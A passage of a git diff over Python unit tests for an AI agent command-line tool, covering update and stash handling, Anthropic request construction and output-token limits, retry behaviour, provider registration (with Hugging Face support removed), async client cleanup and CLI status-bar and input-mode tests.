monkeypatch.setattr("shutil.which", lambda name: "/usr/bin/uv" if name == "uv" else None)
|
||||
|
||||
side_effect, recorded = _make_update_side_effect(current_branch="HEAD")
|
||||
monkeypatch.setattr(hermes_main.subprocess, "run", side_effect)
|
||||
|
||||
hermes_main.cmd_update(SimpleNamespace())
|
||||
|
||||
checkout_calls = [c for c in recorded if "checkout" in c and "main" in c]
|
||||
assert len(checkout_calls) == 1
|
||||
|
||||
out = capsys.readouterr().out
|
||||
assert "detached HEAD" in out
|
||||
|
||||
|
||||
def test_cmd_update_restores_stash_and_branch_when_already_up_to_date(monkeypatch, tmp_path, capsys):
|
||||
"""When on a feature branch with no updates, stash is restored and branch switched back."""
|
||||
_setup_update_mocks(monkeypatch, tmp_path)
|
||||
monkeypatch.setattr("shutil.which", lambda name: "/usr/bin/uv" if name == "uv" else None)
|
||||
|
||||
# Enable stash so it returns a ref
|
||||
monkeypatch.setattr(
|
||||
hermes_main, "_stash_local_changes_if_needed",
|
||||
lambda *a, **kw: "abc123deadbeef",
|
||||
)
|
||||
restore_calls = []
|
||||
monkeypatch.setattr(
|
||||
hermes_main, "_restore_stashed_changes",
|
||||
lambda *a, **kw: restore_calls.append(1) or True,
|
||||
)
|
||||
|
||||
side_effect, recorded = _make_update_side_effect(
|
||||
current_branch="fix/something", commit_count="0",
|
||||
)
|
||||
monkeypatch.setattr(hermes_main.subprocess, "run", side_effect)
|
||||
|
||||
hermes_main.cmd_update(SimpleNamespace())
|
||||
|
||||
# Stash should have been restored
|
||||
assert len(restore_calls) == 1
|
||||
|
||||
# Should have checked out back to the original branch
|
||||
checkout_back = [c for c in recorded if "checkout" in c and "fix/something" in c]
|
||||
assert len(checkout_back) == 1
|
||||
|
||||
out = capsys.readouterr().out
|
||||
assert "Already up to date" in out
|
||||
|
||||
|
||||
def test_cmd_update_no_checkout_when_already_on_main(monkeypatch, tmp_path):
|
||||
"""When already on main, no checkout is needed."""
|
||||
_setup_update_mocks(monkeypatch, tmp_path)
|
||||
monkeypatch.setattr("shutil.which", lambda name: "/usr/bin/uv" if name == "uv" else None)
|
||||
|
||||
side_effect, recorded = _make_update_side_effect()
|
||||
monkeypatch.setattr(hermes_main.subprocess, "run", side_effect)
|
||||
|
||||
hermes_main.cmd_update(SimpleNamespace())
|
||||
|
||||
checkout_calls = [c for c in recorded if "checkout" in c]
|
||||
assert len(checkout_calls) == 0
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Fetch failure — friendly error messages
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def test_cmd_update_network_error_shows_friendly_message(monkeypatch, tmp_path, capsys):
|
||||
"""Network failures during fetch show a user-friendly message."""
|
||||
_setup_update_mocks(monkeypatch, tmp_path)
|
||||
|
||||
side_effect, _ = _make_update_side_effect(
|
||||
fetch_fails=True,
|
||||
fetch_stderr="fatal: unable to access 'https://...': Could not resolve host: github.com",
|
||||
)
|
||||
monkeypatch.setattr(hermes_main.subprocess, "run", side_effect)
|
||||
|
||||
with pytest.raises(SystemExit, match="1"):
|
||||
hermes_main.cmd_update(SimpleNamespace())
|
||||
|
||||
out = capsys.readouterr().out
|
||||
assert "Network error" in out
|
||||
|
||||
|
||||
def test_cmd_update_auth_error_shows_friendly_message(monkeypatch, tmp_path, capsys):
|
||||
"""Auth failures during fetch show a user-friendly message."""
|
||||
_setup_update_mocks(monkeypatch, tmp_path)
|
||||
|
||||
side_effect, _ = _make_update_side_effect(
|
||||
fetch_fails=True,
|
||||
fetch_stderr="fatal: Authentication failed for 'https://...'",
|
||||
)
|
||||
monkeypatch.setattr(hermes_main.subprocess, "run", side_effect)
|
||||
|
||||
with pytest.raises(SystemExit, match="1"):
|
||||
hermes_main.cmd_update(SimpleNamespace())
|
||||
|
||||
out = capsys.readouterr().out
|
||||
assert "Authentication failed" in out
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# reset --hard failure — don't attempt stash restore
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def test_cmd_update_skips_stash_restore_when_reset_fails(monkeypatch, tmp_path, capsys):
|
||||
"""When reset --hard fails, stash restore is skipped with a helpful message."""
|
||||
_setup_update_mocks(monkeypatch, tmp_path)
|
||||
# Re-enable stash so it actually returns a ref
|
||||
monkeypatch.setattr(
|
||||
hermes_main, "_stash_local_changes_if_needed",
|
||||
lambda *a, **kw: "abc123deadbeef",
|
||||
)
|
||||
restore_calls = []
|
||||
monkeypatch.setattr(
|
||||
hermes_main, "_restore_stashed_changes",
|
||||
lambda *a, **kw: restore_calls.append(1) or True,
|
||||
)
|
||||
|
||||
side_effect, _ = _make_update_side_effect(ff_only_fails=True, reset_fails=True)
|
||||
monkeypatch.setattr(hermes_main.subprocess, "run", side_effect)
|
||||
|
||||
with pytest.raises(SystemExit, match="1"):
|
||||
hermes_main.cmd_update(SimpleNamespace())
|
||||
|
||||
# Stash restore should NOT have been called
|
||||
assert len(restore_calls) == 0
|
||||
|
||||
out = capsys.readouterr().out
|
||||
assert "preserved in stash" in out
|
||||
|
||||
@@ -801,48 +801,6 @@ class TestConvertMessages:
|
||||
assert all(not (b.get("type") == "text" and b.get("text") == "") for b in assistant_blocks)
|
||||
assert any(b.get("type") == "tool_use" for b in assistant_blocks)
|
||||
|
||||
def test_empty_user_message_string_gets_placeholder(self):
|
||||
"""Empty user message strings should get '(empty message)' placeholder.
|
||||
|
||||
Anthropic rejects requests with empty user message content.
|
||||
Regression test for #3143 — Discord @mention-only messages.
|
||||
"""
|
||||
messages = [
|
||||
{"role": "user", "content": ""},
|
||||
]
|
||||
_, result = convert_messages_to_anthropic(messages)
|
||||
assert result[0]["role"] == "user"
|
||||
assert result[0]["content"] == "(empty message)"
|
||||
|
||||
def test_whitespace_only_user_message_gets_placeholder(self):
|
||||
"""Whitespace-only user messages should also get placeholder."""
|
||||
messages = [
|
||||
{"role": "user", "content": " \n\t "},
|
||||
]
|
||||
_, result = convert_messages_to_anthropic(messages)
|
||||
assert result[0]["content"] == "(empty message)"
|
||||
|
||||
def test_empty_user_message_list_gets_placeholder(self):
|
||||
"""Empty content list for user messages should get placeholder block."""
|
||||
messages = [
|
||||
{"role": "user", "content": []},
|
||||
]
|
||||
_, result = convert_messages_to_anthropic(messages)
|
||||
assert result[0]["role"] == "user"
|
||||
assert isinstance(result[0]["content"], list)
|
||||
assert len(result[0]["content"]) == 1
|
||||
assert result[0]["content"][0] == {"type": "text", "text": "(empty message)"}
|
||||
|
||||
def test_user_message_with_empty_text_blocks_gets_placeholder(self):
|
||||
"""User message with only empty text blocks should get placeholder."""
|
||||
messages = [
|
||||
{"role": "user", "content": [{"type": "text", "text": ""}, {"type": "text", "text": " "}]},
|
||||
]
|
||||
_, result = convert_messages_to_anthropic(messages)
|
||||
assert result[0]["role"] == "user"
|
||||
assert isinstance(result[0]["content"], list)
|
||||
assert result[0]["content"] == [{"type": "text", "text": "(empty message)"}]
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Build kwargs
|
||||
@@ -926,8 +884,7 @@ class TestBuildAnthropicKwargs:
|
||||
)
|
||||
assert "thinking" not in kwargs
|
||||
|
||||
def test_default_max_tokens_uses_model_output_limit(self):
|
||||
"""When max_tokens is None, use the model's native output limit."""
|
||||
def test_default_max_tokens(self):
|
||||
kwargs = build_anthropic_kwargs(
|
||||
model="claude-sonnet-4-20250514",
|
||||
messages=[{"role": "user", "content": "Hi"}],
|
||||
@@ -935,135 +892,7 @@ class TestBuildAnthropicKwargs:
|
||||
max_tokens=None,
|
||||
reasoning_config=None,
|
||||
)
|
||||
assert kwargs["max_tokens"] == 64_000 # Sonnet 4 output limit
|
||||
|
||||
def test_default_max_tokens_opus_4_6(self):
|
||||
kwargs = build_anthropic_kwargs(
|
||||
model="claude-opus-4-6",
|
||||
messages=[{"role": "user", "content": "Hi"}],
|
||||
tools=None,
|
||||
max_tokens=None,
|
||||
reasoning_config=None,
|
||||
)
|
||||
assert kwargs["max_tokens"] == 128_000
|
||||
|
||||
def test_default_max_tokens_sonnet_4_6(self):
|
||||
kwargs = build_anthropic_kwargs(
|
||||
model="claude-sonnet-4-6",
|
||||
messages=[{"role": "user", "content": "Hi"}],
|
||||
tools=None,
|
||||
max_tokens=None,
|
||||
reasoning_config=None,
|
||||
)
|
||||
assert kwargs["max_tokens"] == 64_000
|
||||
|
||||
def test_default_max_tokens_date_stamped_model(self):
|
||||
"""Date-stamped model IDs should resolve via substring match."""
|
||||
kwargs = build_anthropic_kwargs(
|
||||
model="claude-sonnet-4-5-20250929",
|
||||
messages=[{"role": "user", "content": "Hi"}],
|
||||
tools=None,
|
||||
max_tokens=None,
|
||||
reasoning_config=None,
|
||||
)
|
||||
assert kwargs["max_tokens"] == 64_000
|
||||
|
||||
def test_default_max_tokens_older_model(self):
|
||||
kwargs = build_anthropic_kwargs(
|
||||
model="claude-3-5-sonnet-20241022",
|
||||
messages=[{"role": "user", "content": "Hi"}],
|
||||
tools=None,
|
||||
max_tokens=None,
|
||||
reasoning_config=None,
|
||||
)
|
||||
assert kwargs["max_tokens"] == 8_192
|
||||
|
||||
def test_default_max_tokens_unknown_model_uses_highest(self):
|
||||
"""Unknown future models should get the highest known limit."""
|
||||
kwargs = build_anthropic_kwargs(
|
||||
model="claude-ultra-5-20260101",
|
||||
messages=[{"role": "user", "content": "Hi"}],
|
||||
tools=None,
|
||||
max_tokens=None,
|
||||
reasoning_config=None,
|
||||
)
|
||||
assert kwargs["max_tokens"] == 128_000
|
||||
|
||||
def test_explicit_max_tokens_overrides_default(self):
|
||||
"""User-specified max_tokens should be respected."""
|
||||
kwargs = build_anthropic_kwargs(
|
||||
model="claude-opus-4-6",
|
||||
messages=[{"role": "user", "content": "Hi"}],
|
||||
tools=None,
|
||||
max_tokens=4096,
|
||||
reasoning_config=None,
|
||||
)
|
||||
assert kwargs["max_tokens"] == 4096
|
||||
|
||||
def test_context_length_clamp(self):
|
||||
"""max_tokens should be clamped to context_length if it's smaller."""
|
||||
kwargs = build_anthropic_kwargs(
|
||||
model="claude-opus-4-6", # 128K output
|
||||
messages=[{"role": "user", "content": "Hi"}],
|
||||
tools=None,
|
||||
max_tokens=None,
|
||||
reasoning_config=None,
|
||||
context_length=50000,
|
||||
)
|
||||
assert kwargs["max_tokens"] == 49999 # context_length - 1
|
||||
|
||||
def test_context_length_no_clamp_when_larger(self):
|
||||
"""No clamping when context_length exceeds output limit."""
|
||||
kwargs = build_anthropic_kwargs(
|
||||
model="claude-sonnet-4-6", # 64K output
|
||||
messages=[{"role": "user", "content": "Hi"}],
|
||||
tools=None,
|
||||
max_tokens=None,
|
||||
reasoning_config=None,
|
||||
context_length=200000,
|
||||
)
|
||||
assert kwargs["max_tokens"] == 64_000
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Model output limit lookup
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestGetAnthropicMaxOutput:
|
||||
def test_opus_4_6(self):
|
||||
from agent.anthropic_adapter import _get_anthropic_max_output
|
||||
assert _get_anthropic_max_output("claude-opus-4-6") == 128_000
|
||||
|
||||
def test_opus_4_6_variant(self):
|
||||
from agent.anthropic_adapter import _get_anthropic_max_output
|
||||
assert _get_anthropic_max_output("claude-opus-4-6:1m:fast") == 128_000
|
||||
|
||||
def test_sonnet_4_6(self):
|
||||
from agent.anthropic_adapter import _get_anthropic_max_output
|
||||
assert _get_anthropic_max_output("claude-sonnet-4-6") == 64_000
|
||||
|
||||
def test_sonnet_4_date_stamped(self):
|
||||
from agent.anthropic_adapter import _get_anthropic_max_output
|
||||
assert _get_anthropic_max_output("claude-sonnet-4-20250514") == 64_000
|
||||
|
||||
def test_claude_3_5_sonnet(self):
|
||||
from agent.anthropic_adapter import _get_anthropic_max_output
|
||||
assert _get_anthropic_max_output("claude-3-5-sonnet-20241022") == 8_192
|
||||
|
||||
def test_claude_3_opus(self):
|
||||
from agent.anthropic_adapter import _get_anthropic_max_output
|
||||
assert _get_anthropic_max_output("claude-3-opus-20240229") == 4_096
|
||||
|
||||
def test_unknown_future_model(self):
|
||||
from agent.anthropic_adapter import _get_anthropic_max_output
|
||||
assert _get_anthropic_max_output("claude-ultra-5-20260101") == 128_000
|
||||
|
||||
def test_longest_prefix_wins(self):
|
||||
"""'claude-3-5-sonnet' should match before 'claude-3-5'."""
|
||||
from agent.anthropic_adapter import _get_anthropic_max_output
|
||||
# claude-3-5-sonnet (8192) should win over a hypothetical shorter match
|
||||
assert _get_anthropic_max_output("claude-3-5-sonnet-20241022") == 8_192
|
||||
assert kwargs["max_tokens"] == 16384
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
@@ -217,17 +217,10 @@ def test_529_overloaded_is_retried_and_recovers(monkeypatch):
|
||||
|
||||
|
||||
def test_429_exhausts_all_retries_before_raising(monkeypatch):
|
||||
"""429 must retry max_retries times, then return a failed result.
|
||||
|
||||
The agent no longer re-raises after exhausting retries — it returns a
|
||||
result dict with the error in final_response. This changed when the
|
||||
fallback-provider feature was added (the agent tries a fallback before
|
||||
giving up, and returns a result dict either way).
|
||||
"""
|
||||
"""429 must retry max_retries times, not abort on first attempt."""
|
||||
agent_cls = _make_agent_cls(_RateLimitError) # always fails
|
||||
result = _run_with_agent(monkeypatch, agent_cls)
|
||||
resp = str(result.get("final_response", ""))
|
||||
assert "429" in resp or "retries" in resp.lower()
|
||||
with pytest.raises(_RateLimitError):
|
||||
_run_with_agent(monkeypatch, agent_cls)
|
||||
|
||||
|
||||
def test_400_bad_request_is_non_retryable(monkeypatch):
|
||||
|
||||
@@ -38,7 +38,6 @@ class TestProviderRegistry:
|
||||
@pytest.mark.parametrize("provider_id,name,auth_type", [
|
||||
("copilot-acp", "GitHub Copilot ACP", "external_process"),
|
||||
("copilot", "GitHub Copilot", "api_key"),
|
||||
("huggingface", "Hugging Face", "api_key"),
|
||||
("zai", "Z.AI / GLM", "api_key"),
|
||||
("kimi-coding", "Kimi / Moonshot", "api_key"),
|
||||
("minimax", "MiniMax", "api_key"),
|
||||
@@ -88,11 +87,6 @@ class TestProviderRegistry:
|
||||
assert pconfig.api_key_env_vars == ("KILOCODE_API_KEY",)
|
||||
assert pconfig.base_url_env_var == "KILOCODE_BASE_URL"
|
||||
|
||||
def test_huggingface_env_vars(self):
|
||||
pconfig = PROVIDER_REGISTRY["huggingface"]
|
||||
assert pconfig.api_key_env_vars == ("HF_TOKEN",)
|
||||
assert pconfig.base_url_env_var == "HF_BASE_URL"
|
||||
|
||||
def test_base_urls(self):
|
||||
assert PROVIDER_REGISTRY["copilot"].inference_base_url == "https://api.githubcopilot.com"
|
||||
assert PROVIDER_REGISTRY["copilot-acp"].inference_base_url == "acp://copilot"
|
||||
@@ -102,7 +96,6 @@ class TestProviderRegistry:
|
||||
assert PROVIDER_REGISTRY["minimax-cn"].inference_base_url == "https://api.minimaxi.com/anthropic"
|
||||
assert PROVIDER_REGISTRY["ai-gateway"].inference_base_url == "https://ai-gateway.vercel.sh/v1"
|
||||
assert PROVIDER_REGISTRY["kilocode"].inference_base_url == "https://api.kilo.ai/api/gateway"
|
||||
assert PROVIDER_REGISTRY["huggingface"].inference_base_url == "https://router.huggingface.co/v1"
|
||||
|
||||
def test_oauth_providers_unchanged(self):
|
||||
"""Ensure we didn't break the existing OAuth providers."""
|
||||
@@ -206,18 +199,6 @@ class TestResolveProvider:
|
||||
assert resolve_provider("github-copilot-acp") == "copilot-acp"
|
||||
assert resolve_provider("copilot-acp-agent") == "copilot-acp"
|
||||
|
||||
def test_explicit_huggingface(self):
|
||||
assert resolve_provider("huggingface") == "huggingface"
|
||||
|
||||
def test_alias_hf(self):
|
||||
assert resolve_provider("hf") == "huggingface"
|
||||
|
||||
def test_alias_hugging_face(self):
|
||||
assert resolve_provider("hugging-face") == "huggingface"
|
||||
|
||||
def test_alias_huggingface_hub(self):
|
||||
assert resolve_provider("huggingface-hub") == "huggingface"
|
||||
|
||||
def test_unknown_provider_raises(self):
|
||||
with pytest.raises(AuthError):
|
||||
resolve_provider("nonexistent-provider-xyz")
|
||||
@@ -254,10 +235,6 @@ class TestResolveProvider:
|
||||
monkeypatch.setenv("KILOCODE_API_KEY", "test-kilo-key")
|
||||
assert resolve_provider("auto") == "kilocode"
|
||||
|
||||
def test_auto_detects_hf_token(self, monkeypatch):
|
||||
monkeypatch.setenv("HF_TOKEN", "hf_test_token")
|
||||
assert resolve_provider("auto") == "huggingface"
|
||||
|
||||
def test_openrouter_takes_priority_over_glm(self, monkeypatch):
|
||||
"""OpenRouter API key should win over GLM in auto-detection."""
|
||||
monkeypatch.setenv("OPENROUTER_API_KEY", "or-key")
|
||||
@@ -731,55 +708,3 @@ class TestKimiMoonshotModelListIsolation:
|
||||
coding_models = _PROVIDER_MODELS["kimi-coding"]
|
||||
assert "kimi-for-coding" in coding_models
|
||||
assert "kimi-k2-thinking-turbo" in coding_models
|
||||
|
||||
|
||||
# =============================================================================
|
||||
# Hugging Face provider model list tests
|
||||
# =============================================================================
|
||||
|
||||
class TestHuggingFaceModels:
|
||||
"""Verify Hugging Face model lists are consistent across all locations."""
|
||||
|
||||
def test_main_provider_models_has_huggingface(self):
|
||||
from hermes_cli.main import _PROVIDER_MODELS
|
||||
assert "huggingface" in _PROVIDER_MODELS
|
||||
models = _PROVIDER_MODELS["huggingface"]
|
||||
assert len(models) >= 6, "Expected at least 6 curated HF models"
|
||||
|
||||
def test_models_py_has_huggingface(self):
|
||||
from hermes_cli.models import _PROVIDER_MODELS
|
||||
assert "huggingface" in _PROVIDER_MODELS
|
||||
models = _PROVIDER_MODELS["huggingface"]
|
||||
assert len(models) >= 6
|
||||
|
||||
def test_model_lists_match(self):
|
||||
"""Model lists in main.py and models.py should be identical."""
|
||||
from hermes_cli.main import _PROVIDER_MODELS as main_models
|
||||
from hermes_cli.models import _PROVIDER_MODELS as models_models
|
||||
assert main_models["huggingface"] == models_models["huggingface"]
|
||||
|
||||
def test_model_metadata_has_context_lengths(self):
|
||||
"""Every HF model should have a context length entry."""
|
||||
from hermes_cli.models import _PROVIDER_MODELS
|
||||
from agent.model_metadata import DEFAULT_CONTEXT_LENGTHS
|
||||
hf_models = _PROVIDER_MODELS["huggingface"]
|
||||
for model in hf_models:
|
||||
assert model in DEFAULT_CONTEXT_LENGTHS, (
|
||||
f"HF model {model!r} missing from DEFAULT_CONTEXT_LENGTHS"
|
||||
)
|
||||
|
||||
def test_models_use_org_name_format(self):
|
||||
"""HF models should use org/name format (e.g. Qwen/Qwen3-235B)."""
|
||||
from hermes_cli.models import _PROVIDER_MODELS
|
||||
for model in _PROVIDER_MODELS["huggingface"]:
|
||||
assert "/" in model, f"HF model {model!r} missing org/ prefix"
|
||||
|
||||
def test_provider_aliases_in_models_py(self):
|
||||
from hermes_cli.models import _PROVIDER_ALIASES
|
||||
assert _PROVIDER_ALIASES.get("hf") == "huggingface"
|
||||
assert _PROVIDER_ALIASES.get("hugging-face") == "huggingface"
|
||||
|
||||
def test_provider_label(self):
|
||||
from hermes_cli.models import _PROVIDER_LABELS
|
||||
assert "huggingface" in _PROVIDER_LABELS
|
||||
assert _PROVIDER_LABELS["huggingface"] == "Hugging Face"
|
||||
|
||||
@@ -1,162 +0,0 @@
|
||||
"""Tests for the AsyncHttpxClientWrapper.__del__ neuter fix.
|
||||
|
||||
The OpenAI SDK's ``AsyncHttpxClientWrapper.__del__`` schedules
|
||||
``aclose()`` via ``asyncio.get_running_loop().create_task()``. When GC
|
||||
fires during CLI idle time, prompt_toolkit's event loop picks up the task
|
||||
and crashes with "Event loop is closed" because the underlying TCP
|
||||
transport is bound to a dead worker loop.
|
||||
|
||||
The three-layer defence:
|
||||
1. ``neuter_async_httpx_del()`` replaces ``__del__`` with a no-op.
|
||||
2. A custom asyncio exception handler silences residual errors.
|
||||
3. ``cleanup_stale_async_clients()`` evicts stale cache entries.
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import threading
|
||||
from types import SimpleNamespace
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Layer 1: neuter_async_httpx_del
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestNeuterAsyncHttpxDel:
|
||||
"""Verify neuter_async_httpx_del replaces __del__ on the SDK class."""
|
||||
|
||||
def test_del_becomes_noop(self):
|
||||
"""After neuter, __del__ should do nothing (no RuntimeError)."""
|
||||
from agent.auxiliary_client import neuter_async_httpx_del
|
||||
|
||||
try:
|
||||
from openai._base_client import AsyncHttpxClientWrapper
|
||||
except ImportError:
|
||||
pytest.skip("openai SDK not installed")
|
||||
|
||||
# Save original so we can restore
|
||||
original_del = AsyncHttpxClientWrapper.__del__
|
||||
try:
|
||||
neuter_async_httpx_del()
|
||||
# The patched __del__ should be a no-op lambda
|
||||
assert AsyncHttpxClientWrapper.__del__ is not original_del
|
||||
# Calling it should not raise, even without a running loop
|
||||
wrapper = MagicMock(spec=AsyncHttpxClientWrapper)
|
||||
AsyncHttpxClientWrapper.__del__(wrapper) # Should be silent
|
||||
finally:
|
||||
# Restore original to avoid leaking into other tests
|
||||
AsyncHttpxClientWrapper.__del__ = original_del
|
||||
|
||||
def test_neuter_idempotent(self):
|
||||
"""Calling neuter twice doesn't break anything."""
|
||||
from agent.auxiliary_client import neuter_async_httpx_del
|
||||
|
||||
try:
|
||||
from openai._base_client import AsyncHttpxClientWrapper
|
||||
except ImportError:
|
||||
pytest.skip("openai SDK not installed")
|
||||
|
||||
original_del = AsyncHttpxClientWrapper.__del__
|
||||
try:
|
||||
neuter_async_httpx_del()
|
||||
first_del = AsyncHttpxClientWrapper.__del__
|
||||
neuter_async_httpx_del()
|
||||
second_del = AsyncHttpxClientWrapper.__del__
|
||||
# Both calls should succeed; the class should have a no-op
|
||||
assert first_del is not original_del
|
||||
assert second_del is not original_del
|
||||
finally:
|
||||
AsyncHttpxClientWrapper.__del__ = original_del
|
||||
|
||||
def test_neuter_graceful_without_sdk(self):
|
||||
"""neuter_async_httpx_del doesn't raise if the openai SDK isn't installed."""
|
||||
from agent.auxiliary_client import neuter_async_httpx_del
|
||||
|
||||
with patch.dict("sys.modules", {"openai._base_client": None}):
|
||||
# Should not raise
|
||||
neuter_async_httpx_del()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Layer 3: cleanup_stale_async_clients
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestCleanupStaleAsyncClients:
|
||||
"""Verify stale cache entries are evicted and force-closed."""
|
||||
|
||||
def test_removes_stale_entries(self):
|
||||
"""Entries with a closed loop should be evicted."""
|
||||
from agent.auxiliary_client import (
|
||||
_client_cache,
|
||||
_client_cache_lock,
|
||||
cleanup_stale_async_clients,
|
||||
)
|
||||
|
||||
# Create a loop, close it, make a cache entry
|
||||
loop = asyncio.new_event_loop()
|
||||
loop.close()
|
||||
|
||||
mock_client = MagicMock()
|
||||
# Give it _client attribute for _force_close_async_httpx
|
||||
mock_client._client = MagicMock()
|
||||
mock_client._client.is_closed = False
|
||||
|
||||
key = ("test_stale", True, "", "", id(loop))
|
||||
with _client_cache_lock:
|
||||
_client_cache[key] = (mock_client, "test-model", loop)
|
||||
|
||||
try:
|
||||
cleanup_stale_async_clients()
|
||||
with _client_cache_lock:
|
||||
assert key not in _client_cache, "Stale entry should be removed"
|
||||
finally:
|
||||
# Clean up in case test fails
|
||||
with _client_cache_lock:
|
||||
_client_cache.pop(key, None)
|
||||
|
||||
def test_keeps_live_entries(self):
|
||||
"""Entries with an open loop should be preserved."""
|
||||
from agent.auxiliary_client import (
|
||||
_client_cache,
|
||||
_client_cache_lock,
|
||||
cleanup_stale_async_clients,
|
||||
)
|
||||
|
||||
loop = asyncio.new_event_loop() # NOT closed
|
||||
|
||||
mock_client = MagicMock()
|
||||
key = ("test_live", True, "", "", id(loop))
|
||||
with _client_cache_lock:
|
||||
_client_cache[key] = (mock_client, "test-model", loop)
|
||||
|
||||
try:
|
||||
cleanup_stale_async_clients()
|
||||
with _client_cache_lock:
|
||||
assert key in _client_cache, "Live entry should be preserved"
|
||||
finally:
|
||||
loop.close()
|
||||
with _client_cache_lock:
|
||||
_client_cache.pop(key, None)
|
||||
|
||||
def test_keeps_entries_without_loop(self):
|
||||
"""Sync entries (cached_loop=None) should be preserved."""
|
||||
from agent.auxiliary_client import (
|
||||
_client_cache,
|
||||
_client_cache_lock,
|
||||
cleanup_stale_async_clients,
|
||||
)
|
||||
|
||||
mock_client = MagicMock()
|
||||
key = ("test_sync", False, "", "", 0)
|
||||
with _client_cache_lock:
|
||||
_client_cache[key] = (mock_client, "test-model", None)
|
||||
|
||||
try:
|
||||
cleanup_stale_async_clients()
|
||||
with _client_cache_lock:
|
||||
assert key in _client_cache, "Sync entry should be preserved"
|
||||
finally:
|
||||
with _client_cache_lock:
|
||||
_client_cache.pop(key, None)
|
||||
@@ -96,59 +96,6 @@ class TestVerboseAndToolProgress:
|
||||
assert cli.tool_progress_mode in ("off", "new", "all", "verbose")
|
||||
|
||||
|
||||
class TestBusyInputMode:
|
||||
def test_default_busy_input_mode_is_interrupt(self):
|
||||
cli = _make_cli()
|
||||
assert cli.busy_input_mode == "interrupt"
|
||||
|
||||
def test_busy_input_mode_queue_is_honored(self):
|
||||
cli = _make_cli(config_overrides={"display": {"busy_input_mode": "queue"}})
|
||||
assert cli.busy_input_mode == "queue"
|
||||
|
||||
def test_unknown_busy_input_mode_falls_back_to_interrupt(self):
|
||||
cli = _make_cli(config_overrides={"display": {"busy_input_mode": "bogus"}})
|
||||
assert cli.busy_input_mode == "interrupt"
|
||||
|
||||
def test_queue_command_works_while_busy(self):
|
||||
"""When agent is running, /queue should still put the prompt in _pending_input."""
|
||||
cli = _make_cli()
|
||||
cli._agent_running = True
|
||||
cli.process_command("/queue follow up")
|
||||
assert cli._pending_input.get_nowait() == "follow up"
|
||||
|
||||
def test_queue_command_works_while_idle(self):
|
||||
"""When agent is idle, /queue should still queue (not reject)."""
|
||||
cli = _make_cli()
|
||||
cli._agent_running = False
|
||||
cli.process_command("/queue follow up")
|
||||
assert cli._pending_input.get_nowait() == "follow up"
|
||||
|
||||
def test_queue_mode_routes_busy_enter_to_pending(self):
|
||||
"""In queue mode, Enter while busy should go to _pending_input, not _interrupt_queue."""
|
||||
cli = _make_cli(config_overrides={"display": {"busy_input_mode": "queue"}})
|
||||
cli._agent_running = True
|
||||
# Simulate what handle_enter does for non-command input while busy
|
||||
text = "follow up"
|
||||
if cli.busy_input_mode == "queue":
|
||||
cli._pending_input.put(text)
|
||||
else:
|
||||
cli._interrupt_queue.put(text)
|
||||
assert cli._pending_input.get_nowait() == "follow up"
|
||||
assert cli._interrupt_queue.empty()
|
||||
|
||||
def test_interrupt_mode_routes_busy_enter_to_interrupt(self):
|
||||
"""In interrupt mode (default), Enter while busy goes to _interrupt_queue."""
|
||||
cli = _make_cli()
|
||||
cli._agent_running = True
|
||||
text = "redirect"
|
||||
if cli.busy_input_mode == "queue":
|
||||
cli._pending_input.put(text)
|
||||
else:
|
||||
cli._interrupt_queue.put(text)
|
||||
assert cli._interrupt_queue.get_nowait() == "redirect"
|
||||
assert cli._pending_input.empty()
|
||||
|
||||
|
||||
class TestSingleQueryState:
|
||||
def test_voice_and_interrupt_state_initialized_before_run(self):
|
||||
"""Single-query mode calls chat() without going through run()."""
|
||||
|
||||
@@ -182,94 +182,3 @@ class TestCLIUsageReport:
|
||||
assert "Total cost:" in output
|
||||
assert "n/a" in output
|
||||
assert "Pricing unknown for glm-5" in output
|
||||
|
||||
|
||||
class TestStatusBarWidthSource:
|
||||
"""Ensure status bar fragments don't overflow the terminal width."""
|
||||
|
||||
def _make_wide_cli(self):
|
||||
from datetime import datetime, timedelta
|
||||
cli_obj = _attach_agent(
|
||||
_make_cli(),
|
||||
prompt_tokens=100_000,
|
||||
completion_tokens=5_000,
|
||||
total_tokens=105_000,
|
||||
api_calls=20,
|
||||
context_tokens=100_000,
|
||||
context_length=200_000,
|
||||
)
|
||||
cli_obj._status_bar_visible = True
|
||||
return cli_obj
|
||||
|
||||
def test_fragments_fit_within_announced_width(self):
|
||||
"""Total fragment text length must not exceed the width used to build them."""
|
||||
from unittest.mock import MagicMock, patch
|
||||
cli_obj = self._make_wide_cli()
|
||||
|
||||
for width in (40, 52, 76, 80, 120, 200):
|
||||
mock_app = MagicMock()
|
||||
mock_app.output.get_size.return_value = MagicMock(columns=width)
|
||||
|
||||
with patch("prompt_toolkit.application.get_app", return_value=mock_app):
|
||||
frags = cli_obj._get_status_bar_fragments()
|
||||
|
||||
total_text = "".join(text for _, text in frags)
|
||||
assert len(total_text) <= width + 4, ( # +4 for minor padding chars
|
||||
f"At width={width}, fragment total {len(total_text)} chars overflows "
|
||||
f"({total_text!r})"
|
||||
)
|
||||
|
||||
def test_fragments_use_pt_width_over_shutil(self):
|
||||
"""When prompt_toolkit reports a width, shutil.get_terminal_size must not be used."""
|
||||
from unittest.mock import MagicMock, patch
|
||||
cli_obj = self._make_wide_cli()
|
||||
|
||||
mock_app = MagicMock()
|
||||
mock_app.output.get_size.return_value = MagicMock(columns=120)
|
||||
|
||||
with patch("prompt_toolkit.application.get_app", return_value=mock_app) as mock_get_app, \
|
||||
patch("shutil.get_terminal_size") as mock_shutil:
|
||||
cli_obj._get_status_bar_fragments()
|
||||
|
||||
mock_shutil.assert_not_called()
|
||||
|
||||
def test_fragments_fall_back_to_shutil_when_no_app(self):
|
||||
"""Outside a TUI context (no running app), shutil must be used as fallback."""
|
||||
from unittest.mock import MagicMock, patch
|
||||
cli_obj = self._make_wide_cli()
|
||||
|
||||
